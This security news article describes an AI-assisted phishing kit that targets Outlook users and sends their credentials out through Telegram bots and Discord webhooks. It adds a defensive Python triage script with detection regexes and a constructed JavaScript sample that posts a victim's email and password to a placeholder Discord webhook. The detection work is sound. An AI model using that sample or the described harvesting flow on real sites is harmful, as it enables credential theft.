New Phishing Kit with AI-assisted Development Attacking Microsoft Users to Steal Logins


A Spanish-speaking phishing operation targeting Microsoft Outlook users has been active since March 2025, using a sophisticated kit that shows clear indicators of AI-assisted development.

The campaign, tracked through a unique signature of four mushroom emojis embedded in the string “OUTL,” has been observed in over 75 distinct deployments.

The operation captures email credentials along with victim IP addresses and geolocation data, exfiltrating stolen information through Telegram bots and Discord webhooks.

The phishing kit mimics Microsoft’s Outlook login interface with Spanish-language prompts, presenting victims with a convincing authentication page.

Fake login page (Source - The Sage Hollow)

Once users enter their credentials, the kit immediately enriches the stolen data with contextual information by querying api.ipify.org for IP resolution and ipapi.co for geolocation details.

This automated reconnaissance happens in real time before the credentials are packaged and transmitted to the attackers.

The operation demonstrates a high level of technical planning, with multiple variants showing consistent operational patterns despite changes in their obfuscation techniques.

The Sage Hollow researchers identified the campaign after discovering the mushroom emoji signature, which served as a reliable pivot point to track additional deployments.

Analysis of the kit’s evolution revealed several distinct variants, ranging from heavily obfuscated scripts with anti-analysis traps to completely unobfuscated code that resembles AI-generated patterns.

tlgram.js deobfuscated (Source - The Sage Hollow)

The most recent variant, called disBLOCK.js, features clean indentation, clearly named functions, and Spanish-language comments that explain each execution stage; these characteristics are strongly associated with AI-assisted code generation rather than manually developed tools.

Infection Mechanism

The phishing kit operates through a modular architecture where configuration data is separated from execution logic. In early deployments, a script named xjsx.js served as a configuration container, storing Telegram bot tokens and chat IDs using light array rotation obfuscation.

The victim data collection follows a fixed sequence: when a user submits credentials through the fake login form, the kit first validates the email format using a regular expression pattern.

It then triggers the fetchIPData function, which makes HTTPS requests to external APIs to gather IP and location information.

The exfiltration payload maintains a standardized format across all variants, structured as “OUTL CORREO: [victim_email] PASSWR: [victim_password] IP: [ip_address]” followed by location details.

A Cursed Harvest (Source - The Sage Hollow)

Network captures show the data being transmitted via standard HTTPS POST requests to either Telegram bot APIs or Discord webhook endpoints.

The shift toward Discord webhooks represents a tactical evolution, as these function as write-only channels that prevent defenders from accessing historical exfiltration data even when the webhook URL is discovered.
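The collection sequence, payload format and exfiltration channels described above give defenders a small set of static traits to hunt for in captured JavaScript. The following is an added example (the editor's own, not code from The Sage Hollow or from the kit): a triage script that flags the emoji-bearing “OUTL” tag, the `CORREO:`/`PASSWR:`/`IP:` template, the two enrichment APIs and Telegram/Discord exfil endpoints. The regexes are an assumed reading of the article (exact emoji placement in the tag is not published), and the sample script is constructed for the test.

```python
"""Static triage of a JavaScript sample for the OUTL phishing-kit traits
(added example; indicator regexes are assumptions based on the article)."""
import re

MUSHROOM = "\U0001F344"  # the mushroom emoji used in the kit's tag
# "OUTL" with up to three non-letters (emoji, spaces) between the letters
OUTL_LOOSE = re.compile(r"O[^A-Za-z]{0,3}U[^A-Za-z]{0,3}T[^A-Za-z]{0,3}L[^A-Za-z]{0,3}")
# Other traits reported in the article, expressed as assumed regex forms
TRAITS = {
    "exfil_template": re.compile(r"CORREO:.{0,80}PASSWR:.{0,80}IP:", re.S),
    "ip_enrichment": re.compile(r"api\.ipify\.org|ipapi\.co"),
    "telegram_bot_api": re.compile(r"api\.telegram\.org/bot"),
    "discord_webhook": re.compile(r"discord(?:app)?\.com/api/webhooks/"),
}


def mushroom_tags(text: str) -> list[str]:
    """Return every OUTL-like token that carries at least one mushroom emoji."""
    return [m.group(0) for m in OUTL_LOOSE.finditer(text) if MUSHROOM in m.group(0)]


def scan_script(text: str) -> dict[str, int]:
    """Count each trait; the tag is counted by emoji-bearing OUTL tokens."""
    hits = {name: len(rx.findall(text)) for name, rx in TRAITS.items()}
    hits["mushroom_outl_tag"] = len(mushroom_tags(text))
    return hits


def verdict(hits: dict[str, int]) -> str:
    """Tag alone is decisive; otherwise require enrichment, template and channel."""
    if hits["mushroom_outl_tag"]:
        return "match: OUTL kit signature"
    channel = hits["telegram_bot_api"] + hits["discord_webhook"]
    if hits["ip_enrichment"] and channel and hits["exfil_template"]:
        return "suspicious: enrichment + exfil template + webhook/bot"
    return "no match"


# Constructed sample that mimics the reported traits (not real kit code;
# webhook path uses obvious placeholders).
SAMPLE_JS = """
const TAG = "O\U0001F344U\U0001F344T\U0001F344L\U0001F344";
async function fetchIPData() {
  const ip = await (await fetch("https://api.ipify.org?format=json")).json();
  const geo = await (await fetch("https://ipapi.co/" + ip.ip + "/json/")).json();
  return { ip: ip.ip, geo };
}
const body = `${TAG} CORREO: ${email} PASSWR: ${pass} IP: ${info.ip}`;
fetch("https://discord.com/api/webhooks/PLACEHOLDER_ID/PLACEHOLDER_TOKEN", {method: "POST", body});
"""

if __name__ == "__main__":
    h = scan_script(SAMPLE_JS)
    print(h, verdict(h))
```

Because the Discord webhook is write-only, the script's value is in catching the kit before exfiltration; the same regexes can be applied to proxy or web-server logs where the API hostnames appear in plain text.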

Analysis of the kit’s infrastructure reveals a service-oriented ecosystem: deployment layers are deliberately compartmentalized, while exfiltration converges on a shared set of endpoints, indicating a phishing-as-a-service model in which different operators use the same underlying toolkit.
